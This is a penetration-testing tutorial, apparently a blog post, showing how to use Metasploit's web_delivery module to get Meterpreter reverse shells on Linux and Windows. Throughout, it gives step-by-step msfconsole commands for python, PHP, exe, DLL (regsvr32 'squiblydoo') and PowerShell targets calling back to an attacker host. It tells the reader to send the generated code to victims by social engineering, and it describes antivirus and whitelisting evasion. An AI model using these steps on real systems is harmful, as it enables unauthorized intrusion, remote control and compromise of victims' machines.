Kali Linux, Penetration Testing

Command Injection Exploitation using Web Delivery (Linux, Windows)

Hello friends! In this article you will learn how to exploit three different platforms [Linux, windows, using a single exploit of the Metasploit framework.

Requirement

Attacker: Kali Linux

Targeted Platform: Window,PHP,Linux [ubuntu]

Open the terminal in your Kali Linux and type “msfconsole” to load Metasploit framework and execute given below exploit.

This module quickly fires up a web server that serves a payload. The provided command which will allow for a payload to download and execute. It will do it either specified scripting language interpreter or “squiblydoo” via regsvr32.exe for bypassing application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command: e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses “squiblydoo” technique for bypassing application whitelisting. The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>show targets

From given below image you can observe that there are 5 targets, which help you in generating malicious code to create a backdoor in the victim system.

Exploit Linux Platform [python]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 0
msf exploit (web_delivery)>set payload python/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

In this exploit we had set target 0 to generate malicious code for python platform, from given below image you can observe the highlighted malicious python code, now copy it and send to the victim using social engineering method.

As soon as the victim will execute the malicious code in terminal, the attacker will obtain meterpreter session as unauthorized access of the victim system.

Exploit Linux Platform [PHP]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

Now we had set target 1 to generate malicious code for php platform, from given below image you can observe the highlighted malicious php code, now copy it and send to the victim using social engineering method.

As soon as the victim will execute the malicious code in a web browser, the attacker will obtain another meterpreter session as unauthorized access of the victim system.

Exploit Windows Platform [exe]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 2
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

Further, we had set target 2 to generate malicious code for window platform, from given below image you can observe the highlighted malicious powershell.exe, now copy it and send to the victim using social engineering method.

As soon as the victim will execute the malicious code in command prompt, the attacker will obtain a meterpreter session as unauthorized access of the victim system.

Exploit Windows Platform [DLL]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

In this exploit we had set target 3 to generate malicious code for window platform, from given below image you can observe the highlighted malicious dll code, now copy it and send to the victim using social engineering method.

As soon as the victim will execute the malicious code as run command inside the RUN window, the attacker will again obtain meterpreter session and make unauthorized access in the victim system.

Exploit Windows Platform [Powershell Binary]

use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set lhost 192.168.1.132
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>set target 4
msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)>run

In this exploit we had set target 4 to generate malicious code for windows platform, from given below image you can observe the highlighted malicious powershell.exe binary code, now copy it and send to the victim using social engineering method.

As soon as the victim will execute the malicious code in command prompt, the attacker will obtain a meterpreter session as unauthorized access of the victim system.

Hence a single exploit “web delivery script” is quite helpful to hack three different platforms.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here